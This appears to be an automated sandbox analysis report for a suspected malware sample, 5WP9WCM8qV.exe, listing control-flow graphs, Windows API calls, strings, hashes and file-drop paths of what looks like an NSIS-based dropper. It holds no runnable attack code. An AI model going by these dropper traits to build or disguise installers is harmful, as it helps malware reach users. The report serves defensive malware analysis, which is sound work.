                                        control_flow_graph 289 40389e-4038b6 call 40642b 292 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 289->292 293 4038ca-403901 call 405f22 289->293 296 4038c8 292->296 299 403903-403914 call 405f22 293->299 300 403919-40391f lstrcatW 293->300 298 403924-40394d call 403b74 call 405b11 296->298 306 403953-403958 298->306 307 4039df-4039e7 call 405b11 298->307 299->300 300->298 306->307 309 40395e-403986 call 405f22 306->309 313 4039f5-403a1a LoadImageW 307->313 314 4039e9-4039f0 call 406077 307->314 309->307 315 403988-40398c 309->315 317 403a9b-403aa3 call 40140b 313->317 318 403a1c-403a4c RegisterClassW 313->318 314->313 319 40399e-4039aa lstrlenW 315->319 320 40398e-40399b call 405a36 315->320 331 403aa5-403aa8 317->331 332 403aad-403ab8 call 403b74 317->332 321 403a52-403a96 SystemParametersInfoW CreateWindowExW 318->321 322 403b6a 318->322 326 4039d2-4039da call 405a09 call 406055 319->326 327 4039ac-4039ba lstrcmpiW 319->327 320->319 321->317 325 403b6c-403b73 322->325 326->307 327->326 330 4039bc-4039c6 GetFileAttributesW 327->330 334 4039c8-4039ca 330->334 335 4039cc-4039cd call 405a55 330->335 331->325 341 403b41-403b42 call 405287 332->341 342 403abe-403ad8 ShowWindow call 4063bf 332->342 334->326 334->335 335->326 346 403b47-403b49 341->346 347 403ae4-403af6 GetClassInfoW 342->347 348 403ada-403adf call 4063bf 342->348 349 403b63-403b65 call 40140b 346->349 350 403b4b-403b51 346->350 353 403af8-403b08 GetClassInfoW RegisterClassW 347->353 354 403b0e-403b31 DialogBoxParamW call 40140b 347->354 348->347 349->322 350->331 355 403b57-403b5e call 40140b 350->355 353->354 359 403b36-403b3f call 4037ee 354->359 355->331 359->325
                                        APIs
                                          • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                          • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 004038B8
                                          • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                        • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\5WP9WCM8qV.exe"), ref: 0040391F
                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420), ref: 0040399F
                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                        • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen), ref: 00403A06
                                        • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                        • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                        • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                        • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 606308-787027738
                                        • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                        • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                        • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                        • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 362 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 365 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 362->365 366 402e3e-402e43 362->366 374 402f63-402f71 call 402d8a 365->374 375 402e7c 365->375 367 403020-403024 366->367 381 402f73-402f76 374->381 382 402fc6-402fcb 374->382 377 402e81-402e98 375->377 379 402e9a 377->379 380 402e9c-402ea5 call 403242 377->380 379->380 388 402eab-402eb2 380->388 389 402fcd-402fd5 call 402d8a 380->389 384 402f78-402f90 call 403258 call 403242 381->384 385 402f9a-402fc4 GlobalAlloc call 403258 call 403027 381->385 382->367 384->382 408 402f92-402f98 384->408 385->382 413 402fd7-402fe8 385->413 393 402eb4-402ec8 call 405be5 388->393 394 402f2e-402f32 388->394 389->382 399 402f3c-402f42 393->399 411 402eca-402ed1 393->411 398 402f34-402f3b call 402d8a 394->398 394->399 398->399 404 402f51-402f5b 399->404 405 402f44-402f4e call 4064dc 399->405 404->377 412 402f61 404->412 405->404 408->382 408->385 411->399 417 402ed3-402eda 411->417 412->374 414 402ff0-402ff5 413->414 415 402fea 413->415 418 402ff6-402ffc 414->418 415->414 417->399 419 402edc-402ee3 417->419 418->418 420 402ffe-403019 SetFilePointer call 405be5 418->420 419->399 421 402ee5-402eec 419->421 425 40301e 420->425 421->399 422 402eee-402f0e 421->422 422->382 424 402f14-402f18 422->424 426 402f20-402f28 424->426 427 402f1a-402f1e 424->427 425->367 426->399 428 402f2a-402f2c 426->428 427->412 427->426 428->399
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402DFF
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\5WP9WCM8qV.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                          • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                          • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5WP9WCM8qV.exe,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\5WP9WCM8qV.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5WP9WCM8qV.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 4283519449-3695659218
                                        • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                        • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                        • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                        • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 555 401767-40178c call 402bbf call 405a80 560 401796-4017a8 call 406055 call 405a09 lstrcatW 555->560 561 40178e-401794 call 406055 555->561 566 4017ad-4017ae call 4062e9 560->566 561->566 570 4017b3-4017b7 566->570 571 4017b9-4017c3 call 406398 570->571 572 4017ea-4017ed 570->572 579 4017d5-4017e7 571->579 580 4017c5-4017d3 CompareFileTime 571->580 574 4017f5-401811 call 405c2a 572->574 575 4017ef-4017f0 call 405c05 572->575 582 401813-401816 574->582 583 401885-4018ae call 4051b4 call 403027 574->583 575->574 579->572 580->579 585 401867-401871 call 4051b4 582->585 586 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 582->586 597 4018b0-4018b4 583->597 598 4018b6-4018c2 SetFileTime 583->598 595 40187a-401880 585->595 586->570 618 40185c-40185d 586->618 599 402a55 595->599 597->598 601 4018c8-4018d3 CloseHandle 597->601 598->601 605 402a57-402a5b 599->605 603 4018d9-4018dc 601->603 604 402a4c-402a4f 601->604 607 4018f1-4018f4 call 406077 603->607 608 4018de-4018ef call 406077 lstrcatW 603->608 604->599 612 4018f9-40228d call 40579a 607->612 608->612 612->605 618->595 620 40185f-401860 618->620 620->585
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes,?,?,00000031), ref: 004017A8
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes,?,?,00000031), ref: 004017CD
                                          • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                          • Part of subcall function 004051B4: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                          • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                          • Part of subcall function 004051B4: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
                                          • Part of subcall function 004051B4: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                          • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nse2681.tmp$C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll$C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes$Call
                                        • API String ID: 1941528284-2568952899
                                        • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                        • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                        • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                        • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 621 4051b4-4051c9 622 405280-405284 621->622 623 4051cf-4051e0 621->623 624 4051e2-4051e6 call 406077 623->624 625 4051eb-4051f7 lstrlenW 623->625 624->625 627 405214-405218 625->627 628 4051f9-405209 lstrlenW 625->628 630 405227-40522b 627->630 631 40521a-405221 SetWindowTextW 627->631 628->622 629 40520b-40520f lstrcatW 628->629 629->627 632 405271-405273 630->632 633 40522d-40526f SendMessageW * 3 630->633 631->630 632->622 634 405275-405278 632->634 633->632 634->622
                                        APIs
                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                        • lstrlenW.KERNEL32(0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,0040318B,0040318B,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,00000000,0041D820,755723A0), ref: 0040520F
                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll), ref: 00405221
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll
                                        • API String ID: 2531174081-308657127
                                        • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                        • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                        • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                        • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 635 403027-40303e 636 403040 635->636 637 403047-403050 635->637 636->637 638 403052 637->638 639 403059-40305e 637->639 638->639 640 403060-403069 call 403258 639->640 641 40306e-40307b call 403242 639->641 640->641 645 403230 641->645 646 403081-403085 641->646 647 403232-403233 645->647 648 4031db-4031dd 646->648 649 40308b-4030d4 GetTickCount 646->649 652 40323b-40323f 647->652 650 40321d-403220 648->650 651 4031df-4031e2 648->651 653 403238 649->653 654 4030da-4030e2 649->654 655 403222 650->655 656 403225-40322e call 403242 650->656 651->653 657 4031e4 651->657 653->652 658 4030e4 654->658 659 4030e7-4030f5 call 403242 654->659 655->656 656->645 668 403235 656->668 661 4031e7-4031ed 657->661 658->659 659->645 667 4030fb-403104 659->667 664 4031f1-4031ff call 403242 661->664 665 4031ef 661->665 664->645 673 403201-40320d call 405cdc 664->673 665->664 670 40310a-40312a call 40654a 667->670 668->653 677 403130-403143 GetTickCount 670->677 678 4031d3-4031d5 670->678 679 4031d7-4031d9 673->679 680 40320f-403219 673->680 681 403145-40314d 677->681 682 40318e-403190 677->682 678->647 679->647 680->661 683 40321b 680->683 684 403155-403186 MulDiv wsprintfW call 4051b4 681->684 685 40314f-403153 681->685 686 403192-403196 682->686 687 4031c7-4031cb 682->687 683->653 693 40318b 684->693 685->682 685->684 690 403198-40319f call 405cdc 686->690 691 4031ad-4031b8 686->691 687->654 688 4031d1 687->688 688->653 696 4031a4-4031a6 690->696 692 4031bb-4031bf 691->692 692->670 695 4031c5 692->695 693->682 695->653 696->679 697 4031a8-4031ab 696->697 697->692
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: jA$ jA$... %d%%
                                        • API String ID: 551687249-2167919867
                                        • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                        • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                        • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                        • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 698 4025e5-4025fa call 402ba2 701 402600-402607 698->701 702 402a4c-402a4f 698->702 703 402609 701->703 704 40260c-40260f 701->704 705 402a55-402a5b 702->705 703->704 706 402773-40277b 704->706 707 402615-402624 call 405fb5 704->707 706->702 707->706 711 40262a 707->711 712 402630-402634 711->712 713 4026c9-4026cc 712->713 714 40263a-402655 ReadFile 712->714 716 4026e4-4026f4 call 405cad 713->716 717 4026ce-4026d1 713->717 714->706 715 40265b-402660 714->715 715->706 719 402666-402674 715->719 716->706 725 4026f6 716->725 717->716 720 4026d3-4026de call 405d0b 717->720 722 40267a-40268c MultiByteToWideChar 719->722 723 40272f-40273b call 405f9c 719->723 720->706 720->716 722->725 726 40268e-402691 722->726 723->705 729 4026f9-4026fc 725->729 730 402693-40269e 726->730 729->723 732 4026fe-402703 729->732 730->729 733 4026a0-4026c5 SetFilePointer MultiByteToWideChar 730->733 734 402740-402744 732->734 735 402705-40270a 732->735 733->730 736 4026c7 733->736 738 402761-40276d SetFilePointer 734->738 739 402746-40274a 734->739 735->734 737 40270c-40271f 735->737 736->725 737->706 740 402721-402727 737->740 738->706 741 402752-40275f 739->741 742 40274c-402750 739->742 740->712 743 40272d 740->743 741->706 742->738 742->741 743->706
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                          • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                        • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                        • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                        • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 744 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 751 4023c7-4023cf 744->751 752 402a4c-402a5b 744->752 754 4023d1-4023de call 402bbf lstrlenW 751->754 755 4023e2-4023e5 751->755 754->755 756 4023f5-4023f8 755->756 757 4023e7-4023f4 call 402ba2 755->757 762 402409-40241d RegSetValueExW 756->762 763 4023fa-402404 call 403027 756->763 757->756 766 402422-4024fc RegCloseKey 762->766 767 40241f 762->767 763->762 766->752 769 40281e-402825 766->769 767->766 769->752
                                        APIs
                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nse2681.tmp
                                        • API String ID: 1356686001-3553509657
                                        • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
